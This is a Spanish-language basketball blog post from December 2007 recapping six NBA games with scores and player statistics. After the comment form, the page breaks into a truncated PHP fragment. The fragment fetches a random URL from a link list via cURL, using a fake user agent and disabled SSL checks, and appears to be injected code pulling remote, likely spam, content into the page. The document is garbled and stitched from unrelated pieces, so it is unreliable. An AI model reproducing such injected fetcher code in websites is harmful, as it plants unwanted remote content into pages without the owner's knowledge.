La crónica(4/12/07)

05 de December de 2007 por MagicJohnson32

Jornada con sólo 6 partidos que nos ha dejado el duelo anotador entre Suns y Pacers, o lo que es lo mismo, entre Amare Stoudemire y Jermaine O’Neal. También hemos visto la sorpresa, o no, de la victoria de Sacramento ante unos Jazz que no están dando todo lo que pueden fuera de casa y a unos Pistons en los que el banquillo empieza a funcionar y que han pasado por encima de los Hawks sin dificultad. Los Cavaliers siguen sin saber ganar sin LeBron, y de ello se han aprovechado unos Nets en los que Jefferson continua intratable. Por su parte los Lakers se han impuesto a los Timberwolves sin Bynum y con Kobe Bryant enfermo y no han encontrado prácticamente ninguna resistencia. Y por último el duelo de las urgencias entre dos equipos en racha negativa, Bucks y Clippers, que se ha decantado por el equipo que tenía menos bajas.



Pistons 106 – 95 Hawks

Cuando un equipo logra un parcial de 19-34 en el último periodo acostumbra a ganar. Si previamente ha acumulado una desventaja de 26 puntos, de poco sirve. Los Pistons sentenciaron en el tercer cuarto su partido ante los Hawks y se dejaron ir en el último, que los locales aprovecharon para maquillar el marcador final. Liderados por Prince, autor de 23 puntos con 9 de 12 en tiros, los de Michigan contaron con 7 jugadores en dobles figuras en anotación, todos los que dispusieron de más de 15 minutos. Pero lo mejor que hicieron los Pistons fue en defensa: Joe Johnson, líder anotador de los Hawks, se quedó en 5 puntos y sólo Childress fue capaz de superar los 15 en un equipo que no dispuso de Pachulia, Claxton ni Lue.

Nets 100 – 79 Cavs

¡Qué dura es la vida sin LeBron James! Los Cavaliers volvieron a perder en ausencia de su estrella ante unos Nets que apenas tuvieron problemas para imponerse en Ohio. Eso sí, al menos los locales lograron uno de sus objetivos: promocionar a Shannon Brown, de forma que algún equipo se interese por él y lo puedan traspasar y, así, crear espacio para Anderson Varejao antes de que expire el periodo para igualar la oferta de los Bobcats. Brown fue titular y el mejor de los suyos con 20 puntos, 4 rebotes y 4 asistencias, pero no fue ni mucho menos suficiente ante los 36 puntos de Richard Jefferson, líder de un equipo que anotó por encima del 51%, por sólo un 35% de los locales con especial mención al 2 de 15 acumulado entre Ilgauskas y Pavlovic.

Suns 121 – Pacers 117

Duelo entre dos de los equipos más anotadores de la actualidad, Suns y Pacers, que tal y como era de prever, ofreció un juego de ataques rápidos aunque no siempre bien seleccionados. En este intercambio de golpes los Suns llevaban todas las de ganar, y así fue finalmente pese a que los locales pusieron mucha resistencia. Destacó el duelo Stoudemire-O’Neal, en el que ambos se impusieron en el aspecto ofensivo y fueron incapaces de frenar a su rival. Amare acabó con 42 puntos y 13 rebotes, mientras que Jermaine hizo 30 y 11. Ambos contaron con un buen trabajo de sus respectivos bases, con Nash repartiendo 17 asistencias a las que añadió 18 puntos y 6 rebotes, y Tinsley, que logró 19 puntos, 12 asistencias y 4 rebotes. Los 22 puntos de Dunleavy no bastaron para los Pacers, en los que falló Granger con 2 de 11 en tiros. Para los Suns volvió a brillar Hill, con 16 puntos, 5 rebotes y 6 asistencias. Marion, errático con su particular, feísimo aunque frecuentemente efectivo lanzamiento, sumó 14 puntos y 12 rebotes, y Raja Bell añadió 17. Los Pacers caen por debajo del 50% (9-10) y los Suns se van ya a 14-4.

Lakers 116 – Timberwolves 95

Se presentaron los Lakers en Minneapolis tras dos derrotas seguidas, sin Kwame ni Turiaf, ambos lesionados. En la víspera del encuentro, tanto Bryant como Bynum se vieron afectados por un virus estomacal que mandó al pívot al hospital. Kobe se negó a tratarse y jugó. Anotó 13 puntos en el primer cuarto y encarriló el triunfo de los Lakers ante unos tristes T’Wolves que apenas resultaron competitivos. Tanto fue así que Jackson se pudo permitir prescindir de Kobe el último cuarto completo y reservarlo para el partido que esta próxima noche les espera ante los Nuggets. En sus 28 minutos de juego Bryant tuvo tiempo de liderar el encuentro en anotación, con 20 puntos a los que añadió 5 asistencias y 4 robos. Pero la mejor noticia para los Lakers fue la actuación de Trevor Ariza, en su primera ocasión de disputar minutos de calidad desde que llegó de Orlando. El SF lo hizo prácticamente todo bien y firmó 15 puntos con 5 de 5 en tiros de campo y 5 de 6 en libres, más 5 rebotes, 4 asistencias, 4 robos y 1 tapón en 26 minutos. Vujacic añadió 16 puntos y tanto Farmar como Mihm y Walton anotaron 10 o más puntos. En los Wolves apenas se salvó nadie. Jefferson logró 12 puntos y 12 rebotes, Telfair hizo 16 puntos y cuatro jugadores más anotaron en dobles figuras pero la imagen de conjunto fue pésima y las sensaciones no pueden ser peores para el conjunto con el balance más negativo de la liga (2-14).

Jazz 107 – Kings 117

Último cuarto para enmarcar de los Kings que con un impresionante 11 de 14 en tiro consiguieron enjugar la diferencia que los Utah Jazz había puesto en el marcador durante los 2 primeros cuartos. De la mano de un gran Artest y de Kevin Martin, el equipo de Sacramento fue reduciendo la distancia. La lesión de este último hizo pensar que la remontada no iba a llevar a cabo, pero la aparición de Salmons, con 13 puntos consecutivos contribuyó positivamente. Dos triples de Francisco García junto a la buena dirección de Udrih en los últimos minutos del partidos hicieron el resto. Por parte de Utah sólo Deron Williams mantuvo el nivel mostrado en las últimas semanas, aportando 30 puntos y 7 asistencias. El MVP del Oeste del mes de Noviembre, Boozer, se “quedó en unos discretos” 19 puntos y 11 rebotes.

Bucks 87 – Clippers 79

Partido de urgencias el disputado en Los Angeles. Ambos equipos perdieron todos los partidos que disputaron la semana pasada. 4 los Bucks y 3 los Clippers. Y el resultado da una idea bastante aproximada de la razón. Los Clippers son un equipo asolado por las lesiones. Sin Brand, Cassell, Livingston ni el rookie Al Thornton, las posibles variantes ofensivas pasan por Corey Maggette y Chris Kaman y esporádicamente por Tim Thomas. Aun así, han conseguido ganar los dos primeros parciales. Los Bucks tampoco están mucho mejor. Dependen mucho del acierto de Michael Redd. Este se ha entonado en la segunda parte y eso ha bastado para ganar el partido. Junto a él, Bogut, un gran pivot, ha contribuido con 19 puntos y 12 rebotes. El rookie Ji JianLian sigue desaparecido y no está aportando lo que apuntó en las primeras 3 semanas de competición.

Y aquí tenéis las 10 mejores jugadas de esta noche.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>